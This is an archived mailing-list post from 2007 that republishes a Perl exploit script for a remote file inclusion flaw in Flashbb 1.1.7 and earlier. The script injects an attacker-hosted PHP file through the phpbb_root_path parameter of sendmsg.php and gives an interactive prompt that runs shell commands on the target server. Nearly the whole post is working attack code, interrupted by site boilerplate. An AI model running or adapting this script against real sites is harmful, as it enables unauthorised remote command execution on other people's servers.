Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting

Flashbb <= 1.1.7 - Remote File Inclusion Exploit

From: <mata(at)kw3rlndoarme.net>
Date: Tue Jul 10 2007 - 11:16:38 EDT


#!/usr/bin/perl
#
# Flashbb <= 1.1.7 - Remote File Inclusion Exploit
#
# Url: http://rapidshare.com/files/41426468/FlashBB_AaeDueHFcu.zip
#
# Exploit:
# http://site.com/[path]/phpbb/sendmsg.php?phpbb_root_path=[Evil_Script>:]
#
# (c)oded and f0und3d by kw3rln <office[at]rosecuritygroup[dot]net>
#
# Romanian Security Team .: http://RSTZONE.NET :.
#
#
#
# greetz to all RST [rstzone.net] MEMBERZ

use LWP::Simple;

print "...........................[RST]...............................\n";
print ".  .\n";
print ".        Flashbb <= 1.1.7 - Remote File Inclusion Exploit .\n";
print ".  .\n";
print "...............................................................\n";
print ".       Romanian Security Team -> 
http://RSTZONE.NET .\n";
print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
print "...............................................................\n\n";

my $kw3,$path,$shell,$conexiune,$cmd,$data ;

if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];
chomp($shell);

$path = $path."/phpbb/sendmsg.php";

sub usage(){

      print "Usage    : perl $0 host/path 
http://site.com/cmd.txt\n\n";
      print "Example  : perl $0 
http://127.0.0.1 
http://site.com/cmd.txt\n\n";
      print 'Shell    : ';
         }

while ()
{
print "[kw3rln].[rst] :~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { exit(0);}

Do you need help?X

$kw3 = $path."?phpbb_root_path=".$shell."?&cmd=".$cmd; if ($cmd eq "")
 { print "Enter your command !\n"; }
else
 { $data=get($kw3); print $data ; }
} Received on Tue Jul 10 12:33:15 2007

This archive was generated by hypermail 2.1.8 : Mon Jul 16 2007 - 05:18:41 EDT


Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library